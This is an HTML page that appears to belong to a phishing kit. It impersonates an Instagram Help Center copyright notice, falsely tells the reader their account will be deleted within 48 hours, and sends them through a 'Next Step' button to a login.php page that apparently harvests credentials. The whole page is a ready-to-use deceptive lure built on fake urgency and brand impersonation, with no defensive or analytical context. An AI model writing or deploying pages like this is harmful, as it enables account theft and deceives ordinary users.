<!DOCTYPE html>
<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0">
	<style>
	body{
	margin:0;
	padding:0;									
	font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
	background-color: #fff;
}
p#wrnx{
	margin: 10px;
	font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
	color: #9a9a9a;
	font-size: 15px;
}
p#wornix{
	margin: 10px;
	font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
	font-size: 15px;
}

.anan{
	width: 410px;
	overflow: hidden;
	margin: auto;
	margin-top: 240px;
	padding: 20;
	background: #fff;
	border: 1px solid silver;
	border-radius: 5px;

}
.anan input {
	width: 300px;
	height: 35px;
	margin-bottom: 10px;
	border-radius: 3px;
	border:  1px solid silver;
	padding: 5px;

}
.anan .eben{
	padding: 5px;
	background-color: #3498db;
	color: #fff;
	border-radius: 3px;
	border: 0px;
	font-weight: bold;
	font-size: 14px;
	margin: 20px;
}
input#eben{
	padding: 5px;
	background-color: #3498db;
	color: #fff;
	border-radius: 3px;
	border: 0px;
	font-weight: bold;
	font-size: 14px;
	margin-bottom: 20px;
}
img {
	user-select: none;
	-webkit-user-select: none;
	-moz-user-select: none;
	-o-user-select: none;
	pointer-events: none;
}
	</style>
	<title> Instagram Copyright </title>
</head>
<body>
	<div class="anan"><center>
		<div><h2> </h2>
		<img src="z.png" width="100" height="100"/><pre></div>
		<h3>Copyright - Instagram Help Center </h3>
		<p id="wrnx"> Your account has been filed a complaint to our<br> team for violating copyright. Your account<br> will be permanently deleted from our<br> servers withib 48 hours. If this is
		an error,<br> please click the button below to provide<br> feedback. Please note that your account <br>will be permanently deleted if you do not<br> provide feedback. </p>
<a href="login.php"><input name="next" type="submit" id="eben" value="Next Step"></a>
	<br></div>
	<br><br>
</body>
